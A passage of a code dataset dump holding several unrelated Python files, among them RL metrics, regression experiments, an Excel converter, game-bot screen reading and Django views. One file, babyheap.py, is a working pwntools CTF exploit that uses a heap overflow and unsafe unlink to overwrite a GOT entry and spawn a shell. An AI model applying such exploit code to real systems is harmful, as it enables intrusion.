rewards[0] = sum(self.RAN_events[5, start:end])\n rewards[1] = sum(self.RR_events[5, start:end])\n rewards[2] = sum(self.early_events[5, start:end])\n rewards[3] = sum(self.DQN_events[5, start:end])\n #rewards[4] = sum(self.suit_events[5, start:end])\n #rewards[5] = sum(self.sensible_events[5, start:end])\n return np.around(rewards, 2)\n\n def get_FinishTimes(self, policies, start, end):\n finishT = np.zeros(policies)\n finishT[0] = max(self.RAN_events[4, start:end])\n finishT[1] = max(self.RR_events[4, start:end])\n finishT[2] = max(self.early_events[4, start:end])\n finishT[3] = max(self.DQN_events[4, start:end])\n #finishT[4] = max(self.suit_events[4, start:end])\n #finishT[5] = max(self.sensible_events[4, start:end])\n return np.around(finishT, 2)\n\n def get_executeTs(self, policies, start, end):\n executeTs = np.zeros(policies)\n executeTs[0] = np.mean(self.RAN_events[6, start:end])\n executeTs[1] = np.mean(self.RR_events[6, start:end])\n executeTs[2] = np.mean(self.early_events[6, start:end])\n executeTs[3] = np.mean(self.DQN_events[6, start:end])\n #executeTs[4] = np.mean(self.suit_events[6, start:end])\n #executeTs[5] = np.mean(self.sensible_events[6, start:end])\n return np.around(executeTs, 3)\n\n def get_waitTs(self, policies, start, end):\n waitTs = np.zeros(policies)\n waitTs[0] = np.mean(self.RAN_events[2, start:end])\n waitTs[1] = np.mean(self.RR_events[2, start:end])\n waitTs[2] = np.mean(self.early_events[2, start:end])\n waitTs[3] = np.mean(self.DQN_events[2, start:end])\n #waitTs[4] = np.mean(self.suit_events[2, start:end])\n #waitTs[5] = np.mean(self.sensible_events[2, start:end])\n return np.around(waitTs, 3)\n\n def get_responseTs(self, policies, start, end):\n respTs = np.zeros(policies)\n respTs[0] = np.mean(self.RAN_events[3, start:end])\n respTs[1] = np.mean(self.RR_events[3, start:end])\n respTs[2] = np.mean(self.early_events[3, start:end])\n respTs[3] = np.mean(self.DQN_events[3, start:end])\n #respTs[4] = np.mean(self.suit_events[3, start:end])\n #respTs[5] = np.mean(self.sensible_events[3, start:end])\n return np.around(respTs, 3)\n\n def get_successTimes(self, policies, start, end):\n successT = np.zeros(policies)\n successT[0] = sum(self.RAN_events[7, start:end])/(end - start)\n successT[1] = sum(self.RR_events[7, start:end])/(end - start)\n successT[2] = sum(self.early_events[7, start:end])/(end - start)\n successT[3] = sum(self.DQN_events[7, start:end])/(end - start)\n #successT[4] = sum(self.suit_events[7, start:end]) / (end - start)\n #successT[5] = sum(self.sensible_events[7, start:end]) / (end - start)\n # successT = successT.astype(int)\n successT = np.around(successT, 3)\n return successT\n\n def get_rejectTimes(self, policies, start, end):\n reject = np.zeros(policies)\n reject[0] = sum(self.RAN_events[8, start:end])\n reject[1] = sum(self.RR_events[8, start:end])\n reject[2] = sum(self.early_events[8, start:end])\n reject[3] = sum(self.DQN_events[8, start:end])\n #reject[4] = sum(self.suit_events[8, start:end])\n #reject[5] = sum(self.sensible_events[8, start:end])\n return np.around(reject, 2)\n\n def get_JobDistribution(self, policies):\n distributions = np.zeros((policies, self.VMnum))\n distributions[0, :] = self.RAN_VM_events[1, :]/self.jobNum\n distributions[1, :] = self.RR_VM_events[1, :]/self.jobNum\n distributions[2, :] = self.early_VM_events[1, :]/self.jobNum\n distributions[3, :] = self.DQN_VM_events[1, :]/self.jobNum\n #distributions[4, :] = self.suit_VM_events[1, :] / self.jobNum\n #distributions[5, :] = self.sensible_VM_events[1, :] / self.jobNum\n return np.around(distributions, 3)\n\n def get_totalRewards(self, policies, start):\n rewards = np.zeros(policies)\n rewards[0] = sum(self.RAN_events[5, start:self.jobNum])\n rewards[1] = sum(self.RR_events[5, start:self.jobNum])\n rewards[2] = sum(self.early_events[5, start:self.jobNum])\n rewards[3] = sum(self.DQN_events[5, start:self.jobNum])\n #rewards[4] = sum(self.suit_events[5, start:self.jobNum])\n #rewards[5] = sum(self.sensible_events[5, start:self.jobNum])\n return np.around(rewards, 2)\n\n def get_totalTimes(self, policies, start):\n finishT = np.zeros(policies)\n finishT[0] = max(self.RAN_events[4, :]) - self.arrival_Times[start]\n finishT[1] = max(self.RR_events[4, :]) - self.arrival_Times[start]\n finishT[2] = max(self.early_events[4, :]) - self.arrival_Times[start]\n finishT[3] = max(self.DQN_events[4, :]) - self.arrival_Times[start]\n #finishT[4] = max(self.suit_events[4, :]) - self.arrival_Times[start]\n #finishT[5] = max(self.sensible_events[4, :]) - self.arrival_Times[start]\n return np.around(finishT, 2)\n\n def get_avgUtilitizationRate(self, policies, start):\n avgRate = np.zeros(policies) # sum(real_length)/ totalT*VMnum\n avgRate[0] = sum(self.RAN_events[6, start:self.jobNum]) / ((max(self.RAN_events[4, :]) - self.arrival_Times[start]) * self.VMnum)\n avgRate[1] = sum(self.RR_events[6, start:self.jobNum]) / ((max(self.RR_events[4, :]) - self.arrival_Times[start]) * self.VMnum)\n avgRate[2] = sum(self.early_events[6, start:self.jobNum]) / ((max(self.early_events[4, :]) - self.arrival_Times[start]) * self.VMnum)\n avgRate[3] = sum(self.DQN_events[6, start:self.jobNum]) / ((max(self.DQN_events[4, :]) - self.arrival_Times[start]) * self.VMnum)\n #avgRate[4] = sum(self.suit_events[6, start:self.jobNum]) / ((max(self.suit_events[4, :]) - self.arrival_Times[start]) * self.VMnum)\n #avgRate[5] = sum(self.sensible_events[6, start:self.jobNum]) / ((max(self.sensible_events[4, :]) - self.arrival_Times[start]) * self.VMnum)\n return np.around(avgRate, 3)\n\n def get_all_responseTs(self, policies):\n respTs = np.zeros((policies, self.jobNum))\n respTs[0, :] = self.RAN_events[3, :]\n respTs[1, :] = self.RR_events[3, :]\n respTs[2, :] = self.early_events[3, :]\n respTs[3, :] = self.DQN_events[3, :]\n #respTs[4, :] = self.suit_events[3, :]\n #respTs[5, :] = self.sensible_events[3, :]\n return np.around(respTs, 3)\n\n def get_total_responseTs(self, policies, start):\n respTs = np.zeros(policies)\n respTs[0] = np.mean(self.RAN_events[3, start:self.jobNum])\n respTs[1] = np.mean(self.RR_events[3, start:self.jobNum])\n respTs[2] = np.mean(self.early_events[3, start:self.jobNum])\n respTs[3] = np.mean(self.DQN_events[3, start:self.jobNum])\n #respTs[4] = np.mean(self.suit_events[3, start:self.jobNum])\n #respTs[5] = np.mean(self.sensible_events[3, start:self.jobNum])\n return np.around(respTs, 3)\n\n def get_totalSuccess(self, policies, start):\n successT = np.zeros(policies) # sum(self.RAN_events[7, 3000:-1])/(self.jobNum - 3000)\n successT[0] = sum(self.RAN_events[7, start:self.jobNum])/(self.jobNum - start + 1)\n successT[1] = sum(self.RR_events[7, start:self.jobNum])/(self.jobNum - start + 1)\n successT[2] = sum(self.early_events[7, start:self.jobNum])/(self.jobNum - start + 1)\n successT[3] = sum(self.DQN_events[7, start:self.jobNum])/(self.jobNum - start + 1)\n #successT[4] = sum(self.suit_events[7, start:self.jobNum]) / (self.jobNum - start + 1)\n #successT[5] = sum(self.sensible_events[7, start:self.jobNum]) / (self.jobNum - start + 1)\n return np.around(successT, 3)\n\n \n \n\n","sub_path":"Implementation/5000 Jobs/MyEnv1.py","file_name":"MyEnv1.py","file_ext":"py","file_size_in_byte":21334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"112480415","text":"import pickle\nimport os\nglobal bef_calc_around\nbef_calc_around=None\ndef get_around(x,y):\n '''\n 事前計算の結果を返す処理\n :param x: x位置\n :param y: y位置\n :return: その位置でつながってるセルの位置\n '''\n global bef_calc_around\n if bef_calc_around is None:\n if not os.path.exists(\"./around.pkl\"):\n calc_get_around()\n with open(\"./around.pkl\",\"rb\") as around:\n bef_calc_around=pickle.load(around)\n return bef_calc_around[x][y]\ndef calc_get_around():\n '''\n セル全体に_get_aroundを実行し結果を保存する\n :return:\n '''\n bef_calc=[]\n for i in range(9):\n ls=[]\n for j in range(9):\n ls.append(_get_around(i,j))\n bef_calc.append(ls)\n with open(\"./around.pkl\",\"wb\") as f:\n pickle.dump(bef_calc,f)\ndef _get_around(x,y):\n '''\n 周囲のセルを求める\n :param x: x位置\n :param y: y位置\n :return: 辞書型の周囲座標\n '''\n dic={}\n dic[\"RU\"] = get_line_cells_(x,y,\"U\",\"R\")\n dic[\"RD\"] = get_line_cells_(x,y,\"D\",\"R\")\n dic[\"LU\"] = get_line_cells_(x,y,\"U\",\"L\")\n dic[\"LD\"] = get_line_cells_(x,y,\"D\",\"L\")\n dic[\"U\"] = get_line_cells_(x,y,\"U\",None)\n dic[\"D\"] = get_line_cells_(x,y,\"D\",None)\n return dic\ndef get_line_cells_(x,y,vertical,holizon):\n '''\n 直線上のセルを返すメソッド\n :param x: x位置\n :param y: y位置\n :param vertical:上または下\n :param holizon: 右、左またはなし\n :return: それぞれの位置のtuple\n '''\n ls1=[]\n ls2=[]\n bx=x\n by=y\n while True:\n ax,ay=calc_cell_point(bx,by,vertical,holizon)\n if 0<=ay<9 and 0<=ax<9:\n ls1.append(ax)\n ls2.append(ay)\n else:\n break\n bx,by=ax,ay\n return (tuple(ls2),tuple(ls1))\n\ndef calc_cell_point(x,y,vertical,holizon):\n '''\n 実際の隣接セルを返すメソッド\n :param x: x位置\n :param y: y位置\n :param vertical:上または下\n :param holizon: 右、左またはなし\n :return:セル位置\n '''\n if holizon==None:\n if vertical==\"U\":\n return (x,y-1)\n else:\n return (x,y+1)\n if holizon==\"R\":\n rx=x+1\n else:\n rx=x-1\n if vertical==\"U\":\n ry=y - 1 + (x % 2)\n else:\n ry= y + (x%2)\n return (rx,ry)","sub_path":"BeforeCalc.py","file_name":"BeforeCalc.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"252885676","text":"#########################################################################\n#### Ted Brundage, M.S.E., Princeton University\n#### Advisor: Barbara Engelhardt\n####\n#### Code: PM Greedy and Sampling Predictor Generator\n####\n#### Last updated: 4/29/16\n####\n#### Notes and disclaimers:\n#### - Use only numpy.ndarray, not numpy.matrix to avoid any confusion\n#### - If something is a column vector - MAKE IT A COLUMN VECTOR. Makes \n#### manipulation annoying, but it keeps matrix algebra logical. \n####\n#########################################################################\n\n#########################################################################\n###\n### IMPORTS\n###\n\nimport os\nimport sys\nimport time\nfrom copy import deepcopy as dc\nimport datetime\n\nmainpath = \"/Users/Ted/__Engelhardt/Engelhardt_DPP\"\nsys.path.append(os.path.abspath(mainpath))\n\nimport numpy as np\n# import pickle\nimport dill\nimport Predictor as Predictor\nimport PredictorWrapper as PredictorWrapper\nfrom sklearn.linear_model import Ridge, Lasso, Lars\nimport Utils.ExperimentUtils as ExperimentUtils\n\n\n#########################################################################\n\n\nsetStart = int(sys.argv[1])\nsetFinal = int(sys.argv[2])\n\nfor i in range(setStart,setFinal):\n currentDir = 'Fold%d/' % i\n X_tr = np.load('%sX_tr.npy' % currentDir)\n y_tr = np.array([np.load('%sy_tr.npy' % currentDir)]).T\n\n val_size = int(0.1 * X_tr.shape[0])\n X_val = X_tr[0:val_size,:]\n y_val = y_tr[0:val_size,:]\n X_train = X_tr[val_size:,:]\n y_train = y_tr[val_size:,:]\n\n logDir = '%sStandardRegressions/' % currentDir\n if not os.path.exists(logDir):\n os.makedirs(logDir)\n logFile = '%sLogs.txt' % logDir\n\n ##########\n ## OLSR ##\n ##########\n olsr_predictor = Predictor.Predictor(X_tr,y_tr,gamma=np.ones((X_tr.shape[1],1)))\n dill.dump(olsr_predictor,open('%sOLSR.p' % logDir,'wb'))\n\n ###########\n ## RIDGE ##\n ###########\n ridgeLams = np.logspace(-5,6,500)\n\n def ridgeEval(learned):\n learned_yhat = learned.predict(X_val)\n learned_mse = sum((y_val - learned_yhat) ** 2)[0]\n return learned_mse\n\n def ridgeLearn(lam):\n ridge = Ridge(alpha=lam,fit_intercept=False,copy_X=True)\n ridge.fit(X_train,y_train)\n return ridge\n\n optLam = ExperimentUtils.gridSearch1D(ridgeLams, ridgeLearn, ridgeEval, MAX=False)\n ridge_predictor = Predictor.Predictor(X_tr,y_tr,gamma=np.ones((X_tr.shape[1],1)),c=optLam)\n dill.dump(ridge_predictor,open('%sRIDGE.p' % logDir,'wb'))\n with open(logFile,'a') as f:\n f.write('Ridge c: %15.10f\\n' % optLam)\n\n ###########\n ## LASSO ##\n ###########\n lassoLams = np.logspace(-5,6,500)\n\n def lassoEval(learned):\n learned_yhat = learned.predict(X_val)\n learned_mse = sum((y_val - learned_yhat) ** 2)[0]\n return learned_mse\n\n def lassoLearn(lam):\n lasso = Lasso(alpha=lam,fit_intercept=False,copy_X=True,max_iter=1.e7,tol=.0001)\n lasso.fit(X_train,y_train)\n return lasso\n\n optLam = ExperimentUtils.gridSearch1D(lassoLams, lassoLearn, lassoEval, MAX=False)\n lasso = Lasso(alpha=optLam,fit_intercept=False,copy_X=True,max_iter=1.e7,tol=.0001)\n lasso.fit(X_tr,y_tr)\n lasso_beta = np.array([lasso.coef_]).T\n lasso_gamma = np.array([[0. if abs(x) < 1e-100 else 1. for x in lasso.coef_]]).T\n # P = lambda X: lasso.predict(X)\n lasso_predictor = PredictorWrapper.PredictorWrapper(lasso_beta,lasso_gamma,lasso.predict)\n dill.dump(lasso_predictor,open('%sLASSO.p' % logDir,'wb'))\n with open(logFile,'a') as f:\n f.write('Lasso c: %15.10f alpha: %15.10f\\n' % (1./(2.* X_tr.shape[0]), optLam))\n\n\n\n ##############\n ## LARS_SET ##\n ##############\n kappa = [2,4,10]\n for k in kappa:\n lars = Lars(n_nonzero_coefs=k,fit_intercept=False)\n lars.fit(X_tr,y_tr)\n lars_beta = np.array([lars.coef_]).T\n lars_gamma = np.zeros((X_tr.shape[1],1))\n lars_gamma[lars.active_] = 1.\n lars_predictor = PredictorWrapper.PredictorWrapper(lars_beta,lars_gamma,lars.predict)\n dill.dump(lars_predictor,open('%sLARS_%02d.p' % (logDir,k),'wb'))\n\n ##############\n ## LARS_OPT ##\n ##############\n larsKappas = np.linspace(0,40,41,dtype=int)\n\n def larsEval(learned):\n learned_yhat = np.array([learned.predict(X_val)]).T\n learned_mse = sum((y_val - learned_yhat) ** 2)[0]\n return learned_mse\n\n def larsLearn(kap):\n lars = Lars(n_nonzero_coefs=kap,fit_intercept=False)\n lars.fit(X_train,y_train)\n return lars\n\n optKap = ExperimentUtils.gridSearch1D(larsKappas,larsLearn, larsEval, MAX=False)\n lars = Lars(n_nonzero_coefs=optKap,fit_intercept=False)\n lars.fit(X_tr,y_tr)\n # print larsEval(lars)\n lars_beta = np.array([lars.coef_]).T\n lars_gamma = np.zeros((X_tr.shape[1],1))\n lars_gamma[lars.active_] = 1.\n lars_predictor = PredictorWrapper.PredictorWrapper(lars_beta,lars_gamma,lars.predict)\n dill.dump(lars_predictor,open('%sLARS_OPT.p' % logDir,'wb'))\n with open(logFile,'a') as f:\n f.write('Lars optimized n_nonzero_coefs: %d \\n' % optKap)\n\n","sub_path":"UCI/StandardRegressions.py","file_name":"StandardRegressions.py","file_ext":"py","file_size_in_byte":5168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"553951183","text":"#coding:utf-8\nimport xlrd\nimport xlwt\nimport os\nimport sys\n\n# read_excel excel=>mem \n# read_text text=>mem\n\n# write_text mem=>text\n# write_excel mem=>excel\n\n# trans_excel text=>mem=>excel\n# trans_text excel=>mem=>text\n\ndef read_excel(pathname,sheetname='Sheet1'):\n excel = xlrd.open_workbook(pathname)\n if (sheetname in excel.sheet_names()):\n table = []\n sheet = excel.sheet_by_name(sheetname)\n for index in range(sheet.nrows):\n row = sheet.row_values(index)\n table.append(row)\n return table\n else:\n return None\n\ndef write_excel(pathname,table,tablename='Sheet1'):\n workbook = xlwt.Workbook()\n worksheet = workbook.add_sheet(tablename)\n nrows = len(table)\n ncols = 0\n for row in table:\n if ncols <= len(row):\n ncols = len(row)\n for row in range(len(table)):\n record = table[row]\n for col in range(len(record)):\n worksheet.write(row, col, label = table[row][col])\n workbook.save(pathname)\n\ndef read_text(pathname):\n if os.path.exists(pathname):\n with open(pathname, 'r') as file:\n list = file.readlines()\n table = []\n for row in list:\n table.append(row.split(\"\\t\"))\n return table\n else:\n return None\n\ndef write_text(pathname,table,sheetname='Sheet1'):\n if table:\n content = []\n for row in table:\n record = [str(item) for item in row]\n content.append(\"\\t\".join(record))\n file = open(pathname.replace(\".xlsx\",\"\").replace(\".xls\",\"\")+\"_\"+sheetname+\".txt\",\"w\")\n file.write(\"\\n\".join(content))\n file.close\n\ndef trans_text(pathname):\n excel = xlrd.open_workbook(pathname)\n for sheet_name in excel.sheet_names():\n table = read_excel(pathname,sheet_name)\n write_text(pathname,table,sheet_name)\n\ndef trans_excel(pathname,sheetname='Sheet1'):\n table = read_text(pathname)\n if table:\n write_excel(pathname.replace(\".txt\",\"\")+\".xls\",table,sheetname)\n\n# cmd tool\nthe_pathname = sys.argv[-1]\nif \"tabot.py\" not in the_pathname:\n if \".xlsx\" in the_pathname:\n trans_text(the_pathname)\n elif \".xls\" in the_pathname:\n trans_text(the_pathname)\n elif \".txt\" in the_pathname:\n trans_excel(the_pathname)\nelse:\n print(\"tabot loading...\")\n\n","sub_path":"lib/Document/Tabot/tabot.py","file_name":"tabot.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"146229287","text":"import cv2\nimport numpy as np\nimport colors\nimport os\n\nrelevant_buffs = [\"Battle Shout\"]\n\n\nclass PlayerProperties:\n def __init__(self):\n self.hit_points = 0.0\n self.rage_points = 0\n self.buffs = list()\n self.debuffs = list()\n self.level = 1\n self.name = \"Unknown\"\n self.in_combat = False\n self.is_dead = False\n self.is_ghost = False\n self.has_target = False\n self.experience = 0.0\n\n def update_all(self, player_frame_img, exp_bar_img, release_box_img, buffs_section_img):\n self.update_combat_related(\n player_frame_img=player_frame_img,\n buffs_section_img=buffs_section_img)\n self.update_experience(exp_bar_img=exp_bar_img)\n self.update_level(player_frame_img=player_frame_img)\n self.update_name(player_frame_img=player_frame_img)\n self.update_is_dead(release_box_img=release_box_img)\n self.update_is_ghost(buffs_section_img=buffs_section_img)\n\n def update_combat_related(self, player_frame_img, buffs_section_img):\n self.update_hit_points(player_frame_img=player_frame_img)\n self.update_rage_points(player_frame_img=player_frame_img)\n self.update_in_combat(player_frame_img=player_frame_img)\n self.update_buffs(buffs_section_img=buffs_section_img)\n self.update_debuffs(buffs_section_img=buffs_section_img)\n\n def update_hit_points(self, player_frame_img):\n hp_line = player_frame_img[49:50, 96:241]\n green_hp_line = cv2.split(hp_line)[1]\n _, hp_line_threshold = cv2.threshold(green_hp_line, 75, 255, cv2.THRESH_BINARY)\n hp_bar_pixels = len(hp_line_threshold.ravel()) - 1\n for idx, pixel in enumerate(hp_line_threshold.ravel()[::-1]):\n if pixel == 255:\n self.hit_points = ((hp_bar_pixels - idx) / hp_bar_pixels) * 100\n break\n # If the pixel is never found then our health must be zero\n else:\n self.hit_points = 0.0\n\n def update_rage_points(self, player_frame_img):\n rage_line = player_frame_img[61:62, 96:241]\n red_rage_line = cv2.split(rage_line)[2]\n _, rage_line_threshold = cv2.threshold(red_rage_line, 75, 255, cv2.THRESH_BINARY)\n rage_bar_pixels = len(rage_line_threshold.ravel()) - 1\n for idx, pixel in enumerate(rage_line_threshold.ravel()[::-1]):\n if pixel == 255:\n self.rage_points = int(round(((rage_bar_pixels - idx) / rage_bar_pixels) * 100))\n break\n # If the pixel is never found then our rage must be zero\n else:\n self.rage_points = 0\n\n def update_level(self, player_frame_img):\n self.update_in_combat(player_frame_img=player_frame_img)\n if not self.in_combat:\n level_section = player_frame_img[68:81, 14:33]\n level_section[:, :, 0] = 0\n level_section_grey = cv2.cvtColor(level_section, cv2.COLOR_BGR2GRAY)\n _, level_section_threshold = cv2.threshold(level_section_grey, 127, 255,\n cv2.THRESH_BINARY)\n # TODO: Finish this with some number recognition\n self.level = 1\n\n def update_name(self, player_frame_img):\n pass\n\n def update_in_combat(self, player_frame_img):\n combat_icon = player_frame_img[68:81, 14:33]\n combat_icon_grey = cv2.cvtColor(combat_icon, cv2.COLOR_BGR2GRAY)\n ref_combat_icon = cv2.imread(os.path.join(\"..\", \"tests\", \"combat_icon.png\"))\n ref_combat_icon_grey = cv2.cvtColor(ref_combat_icon, cv2.COLOR_BGR2GRAY)\n diff_img = cv2.bitwise_xor(combat_icon_grey, ref_combat_icon_grey)\n if np.sum(diff_img) < 20000:\n self.in_combat = True\n else:\n self.in_combat = False\n\n def update_is_dead(self, release_box_img):\n pass\n\n def update_is_ghost(self, buffs_section_img):\n ghost_debuff_grey = cv2.imread(os.path.join(\"..\", \"tests\", \"ghost_debuff_icon.png\"), 0)\n buffs_grey = cv2.cvtColor(buffs_section_img, cv2.COLOR_BGR2GRAY)\n w, h = ghost_debuff_grey.shape[::-1]\n res = cv2.matchTemplate(buffs_grey, ghost_debuff_grey, cv2.TM_CCOEFF_NORMED)\n threshold = 0.8\n loc = np.where(res >= threshold)\n print(\"G: {}\".format(loc))\n for point in zip(*loc[::-1]):\n cv2.rectangle(buffs_section_img, point, (point[0]+w, point[1]+h), (255,255,0), 2)\n cv2.imshow(\"ghost_found.png\", buffs_section_img)\n\n def update_experience(self, exp_bar_img):\n exp_line = exp_bar_img[3:4, 3:1285]\n exp_line_blue, exp_line_green, exp_line_red = cv2.split(exp_line)\n exp_line_without_bars = cv2.subtract(exp_line_red, exp_line_green)\n _, exp_line_thresh = cv2.threshold(exp_line_without_bars, 80, 255, cv2.THRESH_BINARY)\n exp_bar_pixels = len(exp_line_thresh.ravel()) - 1\n for idx, pixel in enumerate(exp_line_thresh.ravel()[::-1]):\n if pixel == 255:\n self.experience = ((exp_bar_pixels - idx) / exp_bar_pixels) * 100\n break\n # If the pixel is never found then our experience must be zero\n else:\n self.experience = 0\n\n def update_buffs(self, buffs_section_img):\n for buff in relevant_buffs:\n buffs_section_img_copy = buffs_section_img.copy()\n buff_filename = buff.lower().replace(\" \", \"_\") + \"_buff_icon.png\"\n buff_icon_grey = cv2.imread(os.path.join(\"..\", \"tests\", buff_filename), 0)\n buff_section_grey = cv2.cvtColor(buffs_section_img, cv2.COLOR_BGR2GRAY)\n w, h = buff_icon_grey.shape[::-1]\n res = cv2.matchTemplate(buff_section_grey, buff_icon_grey, cv2.TM_CCOEFF_NORMED)\n threshold = 0.8\n loc = np.where(res >= threshold)\n print(\"BS: {}\".format(loc))\n for point in zip(*loc[::-1]):\n cv2.rectangle(buffs_section_img_copy, point, (point[0] + w, point[1] + h), (255, 255, 0), 2)\n cv2.imshow(\"bs_found.png\", buffs_section_img_copy)\n\n\n def update_debuffs(self, buffs_section_img):\n pass\n\n\n","sub_path":"src/player_properties.py","file_name":"player_properties.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"99243894","text":"#!/usr/bin/env python3\n# -*- coding: latin-1 -*-\n# Copyright (c) 2018 John Markus Bjørndalen, jmb@cs.uit.no.\n# See LICENSE.txt for licensing details (MIT License).\n\nfrom common import handle_common_args\nfrom apycsp import process, One2OneChannel, BlackHoleChannel, run_CSP, poisonChannel, Any2OneChannel\nfrom apycsp.plugNplay import Identity\n\nhandle_common_args()\n\n\n@process\nasync def PoisonTest(cout):\n for i in range(100):\n print(i)\n await cout(i)\n await poisonChannel(cout)\n\n\ndef test():\n a = One2OneChannel(\"a\")\n b = One2OneChannel(\"b\")\n c = One2OneChannel(\"c\")\n d = BlackHoleChannel(\"d\")\n\n run_CSP(PoisonTest(a.write),\n Identity(a.read, b.write),\n Identity(b.read, c.write),\n Identity(c.read, d.write))\n for ch in [a, b, c, d]:\n print(\"State of channel\", ch.name, \"- poisoned is\", ch.poisoned)\n\n\n@process\nasync def PoisonReader(cin):\n for i in range(100):\n r = await cin()\n print(i, r)\n await cin.poison()\n\n\n@process\nasync def Count(cout):\n i = 0\n while 1:\n await cout(i)\n i += 1\n\n\ndef test2():\n a = Any2OneChannel()\n run_CSP(Count(a.write),\n Count(a.write),\n PoisonReader(a.read))\n print(\"Processes done\")\n\n\nif __name__ == \"__main__\":\n test()\n test2()\n","sub_path":"test/poisoncheck.py","file_name":"poisoncheck.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"97791073","text":"#!/usr/bin/python\n#coding=utf-8\n#__author__:TaQini\n\nfrom pwn import *\n\nlocal_file = './babyheap'\nlocal_libc = '/lib/x86_64-linux-gnu/libc.so.6'\nremote_libc = local_libc # '../libc.so.6'\n\nis_local = False\nis_remote = False\n\nif len(sys.argv) == 1:\n is_local = True\n p = process(local_file)\n libc = ELF(local_libc)\nelif len(sys.argv) > 1:\n is_remote = True\n if len(sys.argv) == 3:\n host = sys.argv[1]\n port = sys.argv[2]\n else:\n host, port = sys.argv[1].split(':')\n p = remote(host, port)\n libc = ELF(remote_libc)\n\nelf = ELF(local_file)\n\ncontext.log_level = 'debug'\ncontext.arch = elf.arch\n\nse = lambda data :p.send(data)\nsa = lambda delim,data :p.sendafter(delim, data)\nsl = lambda data :p.sendline(data)\nsla = lambda delim,data :p.sendlineafter(delim, data)\nsea = lambda delim,data :p.sendafter(delim, data)\nrc = lambda numb=4096 :p.recv(numb)\nru = lambda delims, drop=True :p.recvuntil(delims, drop)\nuu32 = lambda data :u32(data.ljust(4, '\\0'))\nuu64 = lambda data :u64(data.ljust(8, '\\0'))\ninfo_addr = lambda tag :p.info(tag + ': {:#x}'.format(eval(tag)))\n\ndef debug(cmd=''):\n if is_local: gdb.attach(p,cmd)\n\ndef add(sz,data):\n ru(\">>\")\n sl(\"1\")\n ru(\"size?\")\n sl(str(sz))\n ru(\"content?\")\n sl(data)\n\ndef delete(idx):\n ru(\">>\")\n sl(\"2\")\n ru(\"index ?\")\n sl(str(idx))\n\ndef edit(idx, data):\n ru(\">>\")\n sl(\"4\")\n ru(\"index ?\")\n sl(str(idx))\n ru(\"content ?\")\n se(data) \n\nadd(0x100-8,'0')\nadd(0x100-8,'1')\nadd(0x80-8,'2')\nadd(0x80-8,'3')\n\ndelete(1)\n\nedit(0, '0'*(0x100-8) + '\\x81')\n\nadd(0x180-8,'1')\n\nedit(1,p64(0x00) + p64(0x00) + p64(0x602160+8-24) + p64(0x602160+8-16) + (0x100-8-32-8)*'1' + p64(0xf0) + p64(0x80))\ndelete(2)\n\nedit(1,'A'*16 + p64(elf.got['puts']))\n\n# debug()\nsh = 0x40097F\nedit(0, p64(sh))\n\np.interactive()","sub_path":"unctf2020/pwn/babyheap/babyheap.py","file_name":"babyheap.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"191101753","text":"\"\"\"\nThis module implements a Multinomial Naive Bayes classifier using sklearn.\nThe classifier is saved to a pkl file for future use.\nTests are performed at the end to make sure the model is valid.\n\"\"\"\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.externals import joblib\nfrom sqlalchemy import create_engine\n\n# Because our data set is small, we can save it to RAM. However, if we have a massive\n# dataset, we should save the data to disk or read it from a generator.\n\nLANGUAGES = ['en', 'sv', 'de', 'fr', 'nl', 'ru', 'it', 'es', 'pl', 'vi', 'pt', 'uk', 'fa', 'sco'\n ]\n\nTRAINING_DATA = []\n\n# Connect to database and read information into the TRAININ_DATA list.\ndb = create_engine('sqlite:///scraper/language_data.db')\nconn = db.connect()\nres = conn.execute('select * from train')\nfor row in res:\n TRAINING_DATA.append(row['text'])\n\n\nTRAINING_SET = np.array(TRAINING_DATA) #np.concatenate([language for language in TRAINING_DATA])\n\n# Read in the target int for each language.\nTARGETS = np.array([i for i in range(len(LANGUAGES))])\n\n# This turns a collection of text data into a matrix of frequency counts.\nCOUNT_VECT = CountVectorizer()\nTRAIN_COUNTS = COUNT_VECT.fit_transform(TRAINING_SET)\n\n# tfidTransformer scales down the impact of very frequent tokens -- things like stopwords.\n# http://scikit-learn.org/stable/modules/generated/sklearn.feature_extraction.text.TfidfTransformer.html\nTDIDF_TRANSFORMER = TfidfTransformer()\nTRAIN_TFIDF = TDIDF_TRANSFORMER.fit_transform(TRAIN_COUNTS)\n\n# Train a multinomial Naive Bayes classifier.\nCLASSIFIER = MultinomialNB().fit(TRAIN_TFIDF, TARGETS)\n\n# Save the results of the classifier and the vectorizer so that it does not need to be trained at runtime.\njoblib.dump(COUNT_VECT, 'model/count_vect.pkl')\njoblib.dump(TDIDF_TRANSFORMER, 'model/tdidf_transformer.pkl')\njoblib.dump(CLASSIFIER, 'model/classifier.pkl')\n","sub_path":"model/generate_model.py","file_name":"generate_model.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"365978064","text":"# encoding: utf-8\nfrom __future__ import division\nfrom Project.models import *\nfrom django.http import JsonResponse,HttpResponse\nimport hashlib\nimport os\nimport base64\nimport datetime\nimport json\nfrom collections import Iterable\nfrom django.utils import timezone\nimport subprocess\nimport time\nimport pexpect\nfrom django.core.files.storage import FileSystemStorage\nfrom wand.image import Image\nfrom wand.color import Color\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\nimport math\nimport glob\nimport io\n# Create your views here.\nfilesrc = r\"http://lvmaozi.info:9999/\"\nglobalUserId = 0\ndef convert_video(video_input, video_output):\n # cmds = ['ffmpeg', '-i', video_input, video_output]\n # subprocess.Popen(cmds)\n\n\n cmd = 'ffmpeg -i'+' '+video_input+' '+video_output\n thread = 